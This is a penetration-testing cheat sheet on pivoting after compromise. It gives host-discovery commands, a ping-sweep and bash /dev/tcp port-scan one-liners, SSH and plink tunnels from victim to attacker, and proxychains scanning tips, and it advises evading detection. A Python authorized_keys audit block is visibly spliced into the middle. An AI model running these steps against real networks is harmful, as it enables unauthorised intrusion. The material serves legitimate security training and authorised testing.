
How to get on the next Box (lateral movement)

To get onto the next box you should recon once again, in this order:

1. look for data in caches/configs
2. use the tools on the machine to avoid early detection
3. use static compiled binaries (ooold static-bin collection, nmap 7.80)
4. use scripts to explore the environment
5. last resort: use tools from your machine through the proxy tunnel (very slow!)

Avoid running heavy load on the victim. E.g. scan for open ports on the target machine, then grab the banners with a port list through the proxy tunnel. Note: UDP scans via a TCP tunnel are not possible!

Identify other boxes on the network

Linux

# show arp cache items
arp -a
cat /etc/hosts
cat /etc/resolv.conf
nmcli dev show

Ping sweep one-liner:

for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

Simple port scanner (bash only, uses the /dev/tcp pseudo-device; connects to closed/filtered ports may take a while to time out):

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

Windows

arp -a
type C:\Windows\System32\drivers\etc\hosts
ipconfig /all

Warning: pings are usually blocked by Windows. Check with a port scanner whether the hosts are really down.

Network movement / Proxy with

SSH

There is an excellent visual guide to SSH tunnels.

To kill a backgrounded ssh session, run ps aux | grep ssh and then sudo kill <PID>.

Attacker -> Victim

Local Port Forwarding

  • we can connect to the remote IP
  • behind the remote IP is an inner IP with an inner port available
  • we bind the local port to inner ip:inner port via the remote IP
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
ssh -L <local port>:<inner ip>:<inner port> user@<remote ip> -fN

Local Proxy Forwarding

  • we can connect to the remote IP
  • we bind the local port to a SOCKS4/5 proxy via the remote IP
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
ssh -D <local port> user@<remote ip> -fN

Victim -> Attacker

Reverse Connections

To get a connection from the victim to the attacker, the victim must:

  • create a pair of ssh keys
  • transfer the public key from victim to attacker
  • transfer the private key to the victim
  • config the authorized_keys on the attacker box to avoid getting a shell originating from the victim

This setup is pretty complicated and dangerous, as you open up your attacker box.

Preparation:

# victim
ssh-keygen
# name of the key: ./reverse
# copy the reverse.pub content

# attacker
# restrict the victim's key to port forwarding only: forced command, no agent/X11 forwarding, no pty
echo command=\"echo \'This account can only be used for port forwarding\'\",no-agent-forwarding,no-x11-forwarding,no-pty <public key> >> ~/.ssh/authorized_keys
sudo systemctl status ssh
sudo systemctl start ssh
# generate a throw-away ssh key pair
# copy the private key

# victim
# place the private key somewhere
chmod 600 attacker_id_rsa
ssh <name>@<attacker ip> -i attacker_id_rsa
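The authorized_keys options above are what keep the victim from getting a shell on the attacker box, so it is worth checking every entry in that file actually carries them. The following audit is an added example, not code from the page: it parses authorized_keys lines (quoted option values included), flags entries that still grant a shell, and points out that without permitlisten (OpenSSH 7.8 or later) the victim may request any -R listen port. The sample entries and the key material are constructed placeholders.

```python
# Added example (not the page's code): audit authorized_keys restrictions
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")
# Without "restrict", these three options are what deny an interactive session
LEGACY_DENY = {"no-pty", "no-agent-forwarding", "no-x11-forwarding"}

def _split_unquoted(text, sep):
    """Split on sep, but not inside double quotes (command="echo 'a, b'")."""
    parts, cur, quoted = [], [], False
    for i, ch in enumerate(text):
        if ch == '"' and (i == 0 or text[i - 1] != "\\"):
            quoted = not quoted
        if ch == sep and not quoted:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p for p in parts if p]

def parse_entry(line):
    """Return options, key type and comment of one authorized_keys line."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    fields = _split_unquoted(line, " ")
    # A line that starts with a key type carries no options at all
    options = [] if line.startswith(KEY_TYPES) else _split_unquoted(fields.pop(0), ",")
    return {"options": options, "keytype": fields[0], "comment": " ".join(fields[2:])}

def audit(entry):
    """List what the key still allows beyond the intended port forward."""
    names = {o.split("=", 1)[0] for o in entry["options"]}
    findings = []
    if "restrict" in names:
        if "port-forwarding" not in names:
            findings.append("restrict without port-forwarding: -R will be refused")
    else:
        if "command" not in names:
            findings.append("no forced command: key grants a shell")
        findings += [f"{opt} not set" for opt in sorted(LEGACY_DENY - names)]
    if "permitlisten" not in names:  # OpenSSH 7.8+: caps which -R ports may be opened
        findings.append("permitlisten not set: any -R listen port allowed")
    return findings

# Constructed samples: an open key, the page's option set, and a tightened one
SAMPLE = """
ssh-ed25519 AAAAC3placeholder unrestricted@example
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-ed25519 AAAAC3placeholder page-style@example
restrict,port-forwarding,permitlisten="4444" ssh-ed25519 AAAAC3placeholder hardened@example
"""
```

Run audit(parse_entry(line)) over each line of your own ~/.ssh/authorized_keys; the tightened sample shows the option set that limits the victim's key to one -R listener.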

Remote Port Forwarding

  • we are connected to a remote machine
  • behind the remote IP is an inner IP with an inner port available
  • we bind the attacker port to inner ip:inner port via the attacker IP
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
  • -i the private key from the attacker box
ssh -R <attacker port>:<inner ip>:<inner port> user@<attacker ip> -fN -i attacker_id_rsa

Remote Proxy Forwarding

  • we are connected to a remote machine
  • we bind the attacker port to a SOCKS4/5 proxy via the attacker IP
  • -f will background the ssh connection (doesn't work if a password is required)
  • -N will tell ssh to only port forward (no command execution)
  • -i the private key from the attacker box
ssh -R <attacker port> user@<attacker ip> -fN -i attacker_id_rsa

PLink.exe (Windows)

PLink, from the PuTTY author, is the Windows counterpart to SSH. Nowadays Windows comes with an ssh client and server, but legacy systems will need the help of PLink. The syntax is, for good reason, nearly the same as SSH, so we only list the execution examples without much explanation.

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N
The echo y answers the host-key confirmation prompt for the new host, and -N tells plink to only port forward.

Since PLink can't read id_rsa files from ssh-keygen, we need to convert the key first with puttygen (a Linux tool).

sudo apt install putty-tools
ssh-keygen .....
puttygen inputfile -o outputfile.ppk
Kali already ships with plink.exe under /usr/share/windows-resources/binaries/plink.exe, and a recent version can be found here.

Proxychains

proxychains is used as a command prefix to tunnel a command's traffic from the attacker machine through the victim machine.

Usage: proxychains <command> <args>

The configuration (default here) can be set via (in this order):

  • proxychains -f <file> ...
  • ./proxychains.conf (pwd)
  • ${HOME}/.proxychains/proxychains.conf
  • /etc/proxychains.conf

Caveats

nmap

  • Disable proxy_dns in the config if you want to run scans
  • Only TCP connect scans are possible (no UDP, no SYN, no ICMP)
    • use -Pn -sT to disable ping and force a TCP connect scan (a SYN scan sends raw packets that bypass the proxy)
  • The scan will be very slow.
    • Check open ports from the victim server
    • Run proxychains nmap -Pn -sT -p <port> --script=<script>

FoxyProxy (http/s proxy)

Can be used to proxy web traffic through a proxy, e.g. into a victim network.

Attention: Only proxy selected traffic! You could leak your identity.

Next step

Get on the box